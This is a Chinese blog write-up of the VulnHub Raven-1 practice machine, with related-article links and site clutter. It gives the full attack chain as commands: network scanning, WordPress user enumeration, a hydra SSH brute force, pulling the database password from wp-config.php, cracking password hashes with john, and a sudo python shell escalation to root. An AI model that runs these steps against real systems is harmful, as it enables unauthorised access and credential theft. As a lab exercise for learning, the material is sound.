靶场练习第二十四天~vulnhub靶场之Raven-1

最新推荐文章于 2024-05-20 17:15:46 发布
最新推荐文章于 2024-05-20 17:15:46 发布
阅读量975 收藏 6
点赞数
分类专栏: # 靶机练习 文章标签: 安全 linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_57976347/article/details/123003888
版权

一、准备工作

kali和靶机都选择NAT模式(kali与靶机同网段)

1.靶场环境

下载链接:Raven: 1 ~ VulnHub

2.kali的ip

命令:ifconfig

3.靶机的ip

扫描靶机ip

sudo arp-scan -l

二、信息收集

1.nmap的信息收集

(1)扫描靶机开放的端口及其服务

nmap -A 192.168.101.127

2.网站的信息收集

(1)靶机开放了80端口,先访问靶机网站看看有什么有用的信息

1.访问到http://192.168.101.127/service.html,它的源码发现flag1

2.进入到BLOG,发现wordpress网站

3.看到wordpress网站后台登录到入口

DNS域名解析有问题

4.添加后台域名到hosts文件

1)编辑hosts文件,添加如下内容

sudo vim /etc/hosts

192.168.101.127 raven.local

:wq!

2)重新刷新页面,访问成功

(2)WPscan工具

探测WordPress的漏洞,可以直接使用kali自带的WPscan,先暴力枚举用户名

wpscan --url http://192.168.101.127/wordpress/ -eu

1.发现了两个用户michael和steven,将收集到的用户放到user.txt

(3)hydra工具暴力破解

1.使用hydra运用自身密码库进行暴力破解

cp /usr/share/wordlists/rockyou.txt pass

hydra -L user.txt -P pass 192.168.101.127 ssh

获取到ssh登录到用户密码:michael

(4)ssh远程登录

ssh michael@192.168.101.127

三、漏洞的发现及利用

1.寻找一下flag相关文件

find / -name *flag* 2>/dev/null

(1)查看flag2.txt,拿到flag2

cat /var/www/flag2.txt

2.MySQL

(1)查看靶机是否运行mysql

ps -ef |grep mysql

(2)切换到wordpress目录,发现config配置文件,可能存在用户密码

cd /var/www/html/wordpress

ls -la

(3)查看config文件,发现了数据库的用户密码

用户密码为:root、R@v3nSecurity

cat wp-config.php

(4)用刚才收集到的数据库用户密码登录mysql

mysql -u root -p

R@v3nSecurity

(5)查看mysql的数据库

show databases;

(6)获取数据库里面的flag3、flag4

use wordpress ;

show tables ;

desc wp_posts;

select * from wp_posts;

(7)发现两组用户密码

use wordpress ;

select * from wp_wp_users ;

michael :$P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0

steven:$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/

(8)john解码,最后得到steven:pink84

把密码放入文件swn里面通过john解码

vim swn.txt

cat swn.txt

john swn.txt --wordlist=/usr/share/wordlists/rockyou.txt

四、提权

(1)使用steven用户远程登录ssh

ssh steven@192.168.101.127

pink84

(2)利用优化命令执行终端的命令提权

sudo python -c 'import pty; pty.spawn("/bin/bash");'

flag也可在root查看

汉南帝
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
raven-go:Go中的Sentry客户
02-03
掠夺 raven-go SDK已不再维护,已由sentry-go SDK取代。 在了解有关该项目的更多信息,并查看。 raven是事件/错误记录系统的官方Go SDK。安装go get github.com/getsentry/raven-go注意:支持Go 1.7及更高版本。
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(二)raven1
hyjcking的博客
11-22 1254
接下来使用kali的dirb爆破目录,发现了wordpress目录,说明网站使用了wordpress建站,所以我们一会可以使用wordpress的克星wpscan来扫描。扫描到两个用户名,steven和michael,接下来我们使用hydra对michael用户的ssh密码进行爆破,这里我们使用rockyou.txt字典。尝试了一下sudo提权,发现需要密码,切换目录并查看,命令:cd /var/www/html/wordpress。嘿嘿 提权成功,然后找到flag2.txt,成功拿下这台靶机。
vulnhub靶场,Raven1
kukudeshuo的博客
08-08 418
vulnhub靶场,Raven1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/raven-1,256/ 攻击机:kali(192.168.109.128) 靶机:Raven2(192.168.109.152) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标目标靶机 确定目标靶机IP地址为192.168.109.152 使用nmap扫描查看目标靶机端口开放情况
Vulnhub靶机渗透之 RAVEN: 1
_Co1a
07-30 1759
靶机下载地址:https://www.vulnhub.com/entry/raven-1,256/ Description Raven is a Beginner/Intermediate boot2root machine. There are four flags to find and two intended ways of getting root. Built with VMware and tested on Virtual Box. Set up to use NAT networki
[Vulnhub] Raven-1
weixin_63231007的博客
07-15 373
描述Raven是一个初级/中级boot2root机器。有四个flag可以找到和两种获取root的预期方式。使用VMware构建并在VirtualBox上进行测试。设置为使用NAT网络。信息搜集arp-scan-l进行主机发现靶机ipnmap-A192.168.236.139扫描一下靶机开放的端口及服务访问一下80端口,在services那个板块源码里发现了flag1。...
Vulnhub 靶机--Raven
Beret-81的博客
06-13 328
Vulnhub 靶机--Raven1、信息收集2、获取shell3、提权 1、信息收集 在这里发现了一个PHPmailer 存在命令执行漏洞 2、获取shell 在GitHub 找了一个exp,修改目标IP、目录、端口后,执行脚本 访问http://172.16.200.166/contact.php,此时就会生成后门文件shell.php kali开启监听,然后访问:http://172.16.200.166/shell.php 获取shell: 3、提权 在主机信息收集中获取mysql 账
VulnHub-Raven
热门推荐
江左盟的博客
04-06 1万+
信息收集 使用nmap --min-rate 10000 -A 192.168.58.135 --script=vuln扫描目标主机,如图: 部分关键信息如下: Nmap scan report for 192.168.58.135 Host is up (0.00054s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8
vulnhub-raven
weixin_50683638的博客
12-29 2300
vulnhub-raven 靶机下载:https://download.vulnhub.com/raven/Raven.ova kali:nat模式,靶机也nat模式 探测主机 扫描端口 访问网站,查看源代码,看到service.html访问看到flag1 dirb http://192.168.11.128看到wordpress wpscan --url http://192.168.11.128/wordpress -e u hydra -l michael -P rockyou.txt 192
raven-for-redux:用于Redux的Raven中间件
02-05
Sentry现在建议使用其新的SDK @sentry/browser而不是Raven。 请查看 ,以获取支持新SDK的该库的API兼容分支! 用于Redux的Raven中间件 注意:需要Raven> = 3.9.0。 Raven 3.14.0有此库触发 将每个调度动作的类型记录...
raven-go:raven-go是Sentry的Go客户
05-21
掠夺与进行通信的Go库。 有关API文档,请参见 。
raven-node:Sentry的独立(Node.js)客户端
05-13
因此, raven-node已移至主要的单存储库中,并且此存储库已存档。 请在此处报告任何问题和要求,因为此仓库是只读的。Raven节点-适用于Node.js的Sentry SDK raven-node仅支持Node的LTS版本,因此当前所需的发行版是...
raven-repository:Raven R 包快照存储库
06-09
注册 openshift 并下载rhc工具,然后(这里我将应用程序命名为raven ): rhc app create raven diy # Create applicationrhc cartridge add postgresql-9.2 -a raven # Add the persistence cartridgerhc app stop...
Vulhub靶场之raven
qq_42511731的博客
07-07 602
raven靶场渗透思路
vulnhub raven1
mrwangtw的博客
03-15 4539
nmap主机发现,靶机IP10.0.2.55 扫描端口 进入80端口,查看源代码,没什么信息,直接gobuster扫描目录 直接进入wordpress网页,这里进入登录页面,需要增加一个域名解析 然后直接用wpscan扫描,扫描到两个用户 这里直接用rockyou当作密码,两个用户名当作爆破用户名,wpscan爆破,发现很长时间都没有爆破出来,极大可能方法错误。 上面还有个22端口 ,用上述的密码和用户名去爆破ssh端口,这里有了结果 登录ssh,扫描端口,发现my..
vulnhub靶场--Raven靶场
zzzzzzkeai的博客
12-08 334
vulnhub靶场--Raven靶场
【vulnhub】---Raven1靶机
qq_43168364的博客
08-26 751
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:Raven1靶机(192.168.15.172) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:arp-scan -l 命令:netdiscover -i eth0 -r 192.168.15.0/25 端口扫描 命令:masscan --rate=10000 --ports 0
Vulnhub系列:Raven 1
Ays.Ie的博客
03-07 520
该篇为Vulnhub系列靶机:Raven 1
【甄选靶场】Vulnhub百个项目渗透——项目十五:Raven-1(wp利用,UDF提权)
人间体佐菲的博客
09-17 729
网络安全,渗透测试,信息安全
雅特力AT32 MCU通过IEC 60730功能安全认证,为家电产品提供安全保障
最新发布
2401_83906209的博客
05-20 260
在我们的生活环境中,家电及电子产品功能安全的重要性不容忽视,为避免系统故障时产生危害人身安全的风险,在家电和电子产品上市前都严格要求通过安规认证,确保使用操作上的安全性。IEC 60730作为国际电工委员会制定的家电产品安全标准,AT32 MCU获得此认证不仅证明了其在家电领域的领先实力,更为消费者提供了安全无忧的使用体验,家电厂商可以将认证过的AT32 MCU安全库,快速嵌入家电和电子产品软件系统中进行自检,进而申请最终产品的IEC 60730功能安全标准相关认证,减少开发时间和成本,加速产品上市时程。
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值